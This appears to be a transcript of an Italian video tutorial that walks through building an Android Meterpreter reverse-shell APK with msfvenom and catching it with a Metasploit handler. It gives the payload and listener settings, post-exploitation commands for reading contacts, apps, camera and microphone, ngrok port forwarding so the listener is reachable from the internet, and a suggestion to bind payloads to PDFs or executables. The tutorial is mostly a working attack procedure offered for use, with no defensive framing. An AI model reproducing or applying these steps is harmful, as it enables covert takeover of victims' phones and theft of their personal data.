Ciao, oggi andiamo a fare un piccolo script, a lanciare due comandi sostanzialmente per creare una pickup per reverse shell per Android, per esempio, ma può essere per qualsiasi cosa. Allora, sudo su password di root e si fa msfvenom-p Android slash meta preter slash reverse tcp lhost. Qui ci devi mettere o l'IP della tua macchina, in questo caso della mia macchina di Linux, o di Kali, oppure se usi ngrok l'indirizzo che l'IP che ti dà ngrok. Io ci metto l'indirizzo IP della mia VM, poi lport uguale 444 spazio R slash var slash www slash html e lo chiamiamo crazynet.apk. Chiaramente io già ce l'ho questa. Fammi vedere che se no devo toglierlo. Vabbè, lo chiamo in un altro modo. CrazyNet1.apk. Ovviamente il nome è puramente fantasia, puoi usare qualsiasi nome. Una volta che ti ha fatto, quindi devi aspettare un attimo, andiamo a usare MSF console. Qui ho la mia applicazione. A questo punto, ok, allora andiamo a digitare il comando msf console, premi invio e attendi un attimo che carichi il programma. Nel frattempo che carica, io poi l'applicazione andrò a testare sul mio simulatore di Android, però puoi fare anche sul tuo telefono, se vuoi. Questo non è un grosso problema. Insomma, up to you, come si dice in inglese, dipende da te. A questo punto, quando ce la farà partire. Ora io sinceramente ho provato anche sul mio telefono e funziona, però per comodità lo faccio sul simulatore di Android. A questo punto si fa use multi slash handler invio. Poi, una volta qui si fa set payload android slash meta preter slash reverse underscore TCP e si preme invio. This value, ah, sì, scusate, Android. Si fa set lhost e mettiamo l'indirizzo IP in questo caso della mia VM di Kali. Poi set lport, la porta che avevo già stabilito nel msfvenom e poi exploit. Ok, adesso prendo la mia applicazione che ho creato, che è qui, e la sposto qua sull'altro desktop che tu ancora non vedi, ma c'è. Poi tanto questo rimane qui. Poi io la carico sul simulatore. E una volta che è partita, vedi? Si collega. A questo punto io premo il punto interrogativo e qui ci sono i comandi. Se per esempio
Digito questo comando, dovrei essere in grado di vedere che applicazioni ci sono installate. E praticamente non c'è niente perché è il simulatore. Però guardiamo un attimo. Activity. Copia. Paste. No, activity. Ora questo è il simulatore, sul cellulare è leggermente diverso, insomma, hai più ovviamente opzioni, cioè nel senso più dati. Poi dump contact per vedere i contatti. Non contatti trovati. Sul simulatore non li posso mettere i contatti. Guardiamo che applicazioni funzionano. E qui ce n'è soltanto. No, qui non ce n'è proprio punte. Aspetta un po', fa vedere. Se c'ho. No contact found. Quali altre opzioni ho? Sul cellulare io ho anche le opzioni delle telecamere, per esempio, e del microfono, che qui ovviamente non ho. Comunque, questo è come si imposta il reverse shell, può essere usato sia per le applicazioni dell'APK, quindi del cellulare, sia su un PDF per esempio. Puoi fare il binding con un file exe e quando apri il PDF parte il file exe. Insomma, di opzioni ce ne sono tante. Se vuoi provare con ngrok, devi impostare sul il Venom, che ti faccio rivedere. Esci qui su Venom, qui va impostato l'IP che ti dà ngrok. Ora ti faccio vedere velocemente. Slash ngrok TCP porta 444. Quindi devi impostare qui. Prendi questo indirizzo qua e fai copia. Questo lo devi lasciare aperto, non lo devi chiudere. Poi fai un bel ping. Paste. Prendi l'indirizzo IP. Allora. Copy. Questo lo chiudiamo. Prendi l'indirizzo IP e te ne vai qui. Cancelli questo. E fai paste. Qui supporta, in questo caso, scusa, supporta, in questo caso, fai, cancelli questo e ci metti porta 18576, che è questa. Che è questa qui. E poi fai invio e lui ti crea poi l'APK con questi IP, con questa porta. Poi le informazioni verranno mandate a questo indirizzo IP e poi verranno con il port forwarding verranno inviate tutte a questa porta 444. Per il momento è tutto e ti ringrazio per aver guardato questo video.